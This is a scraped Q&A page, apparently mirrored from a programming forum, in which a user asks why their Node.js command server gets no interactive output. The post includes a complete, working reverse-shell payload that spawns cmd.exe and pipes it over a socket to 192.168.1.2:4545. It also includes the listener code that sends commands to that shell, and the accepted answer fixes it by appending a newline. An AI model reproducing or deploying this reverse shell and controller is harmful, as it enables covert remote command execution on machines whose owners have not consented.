Nodejs reverse shell with net.socket
Question
Good morning everyone i am having a issue with reverse shell in NodeJS when i create socket and listen with netcat its perfectly work but when i create new server with net.Server i receive header of shell but it's not interactive, the shell code is like this:
(function(){
var net = require("net"),
child = require("child_process"),
shell = child.spawn("cmd.exe", []);
var client = new net.Socket();
client.connect(4545, "192.168.1.2", function(){
client.pipe(shell.stdin);
shell.stdout.pipe(client);
shell.stderr.pipe(client);
});
return /a/;
})();
and when i listen with netcat i can get the reverse shell
ncat -nvlp 4545
but the problem arises when I want to create a TCP server in nodejs i receive the banner of cmd.exe but without interactivity
this is the code of server part:
const net = require("net");
let server = new net.Server();
server.listen({ host: '192.168.1.2', port: 4545 }, () => {
console.log(`Server listen in 4545`);
});
server.on("close", () => {
console.log('connection closed')
});
server.on("error", (e) => {
if (e.code === "EADDRINUSE") {
console.log("Address in use, retrying...");
setTimeout(() => {
this.server.close();
this.server.listen(4545, '192.168.1.2');
}, 2000);
}
});
server.on("connection", (socket) => {
console.log("new connection");
// HERE I SEND COMMAND WITH ELECTRON JS
socket.write('command');
console.log((socket.pipe(socket));
// Socket is quitted
socket.on("close", () => {
console.log('socket closed')
});
socket.on("end", () => {
console.log(`Client ${socket} disconnected`);
socket.destroy();
});
});
When i send command example ' dir ' i receive an object with the pipe which is located above in the server So the question is how can i receive the result of command when i send it, example receiving the file and directory listing of socket
Socket {
connecting: false,
_hadError: false,
_parent: null,
_host: null,
_readableState: ReadableState {
objectMode: false,
highWaterMark: 16384,
buffer: BufferList { head: null, tail: null, length: 0 },
length: 0,
pipes: [Circular],
pipesCount: 1,
flowing: true,
ended: false,
endEmitted: false,
reading: true,
sync: false,
needReadable: true,
emittedReadable: false,
readableListening: false,
resumeScheduled: false,
paused: false,
emitClose: false,
autoDestroy: false,
destroyed: false,
defaultEncoding: 'utf8',
awaitDrain: 0,
readingMore: false,
decoder: null,
encoding: null
},
readable: true,
_events: [Object: null prototype] {
end: [ [Function: onReadableStreamEnd], [Function], [Function] ],
close: [ [Function], [Function] ],
data: [ [Function], [Function: ondata] ],
unpipe: [Function: onunpipe],
error: [Function: onerror],
finish: [Function: bound onceWrapper] { listener: [Function: onfinish] }
},
_eventsCount: 6,
_maxListeners: undefined,
_writableState: WritableState {
objectMode: false,
highWaterMark: 16384,
finalCalled: false,
needDrain: false,
ending: false,
ended: false,
finished: false,
destroyed: false,
decodeStrings: false,
defaultEncoding: 'utf8',
length: 0,
writing: false,
corked: 0,
sync: false,
bufferProcessing: false,
onwrite: [Function: bound onwrite],
writecb: null,
writelen: 0,
afterWriteTickInfo: {
count: 1,
cb: [Function: nop],
stream: [Circular],
state: [Circular]
},
bufferedRequest: null,
lastBufferedRequest: null,
pendingcb: 1,
prefinished: false,
errorEmitted: false,
emitClose: false,
autoDestroy: false,
bufferedRequestCount: 0,
corkedRequestsFree: {
next: null,
entry: null,
finish: [Function: bound onCorkedFinish]
}
},
writable: true,
allowHalfOpen: false,
_sockname: { address: '192.168.1.2', family: 'IPv4', port: 4545},
_pendingData: null,
_pendingEncoding: '',
server: Server {
_events: [Object: null prototype] {
listening: [Function],
close: [Function],
error: [Function],
connection: [Function]
},
_eventsCount: 4,
_maxListeners: undefined,
_connections: 1,
_handle: TCP {
reading: false,
onconnection: [Function: onconnection],
[Symbol(owner)]: [Circular]
},
_usingWorkers: false,
_workers: [],
_unref: false,
allowHalfOpen: false,
pauseOnConnect: false,
_connectionKey: '4:192.168.1.2:4443',
[Symbol(asyncId)]: 16
},
_server: Server {
_events: [Object: null prototype] {
listening: [Function],
close: [Function],
error: [Function],
connection: [Function]
},
_eventsCount: 4,
_maxListeners: undefined,
_connections: 1,
_handle: TCP {
reading: false,
onconnection: [Function: onconnection],
[Symbol(owner)]: [Circular]
},
_usingWorkers: false,
_workers: [],
_unref: false,
allowHalfOpen: false,
pauseOnConnect: false,
_connectionKey: '4:192.168.1.2:4545',
[Symbol(asyncId)]: 16
},
id: 790,
_peername: { address: '192.168.1.2', family: 'IPv4', port: 59793 },
[Symbol(asyncId)]: 18,
[Symbol(kHandle)]: TCP {
reading: true,
onconnection: null,
[Symbol(owner)]: [Circular]
},
[Symbol(lastWriteQueueSize)]: 0,
[Symbol(timeout)]: null,
[Symbol(kBuffer)]: null,
[Symbol(kBufferCb)]: null,
[Symbol(kBufferGen)]: null,
[Symbol(kBytesRead)]: 0,
[Symbol(kBytesWritten)]: 0
}
1 answers
solution1
0 2020-06-07 15:24:46
After several attempts I managed to add \n in write to enter the code becomes so the code become
socket.write('command'+ '\n');
The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.
Related Question
Reconnect net.socket nodejs
NodeJS net.socket Pipe by condition/filter
NodeJs net.Socket() events not firing
Correct way of reconnecting to the socket after ECONNRESET (Nodejs net.Socket)
NodeJS Child Process can't send net.socket fd:3
NodeJS 0.10. No 'data' event emitted on net.Socket
NodeJS net.Socket: `connect` vs `ready` event
Pass net.socket as argument
When should I use socket.pipe() on NodeJs net.socket
Cassandra with react, net.socket error
Related Tags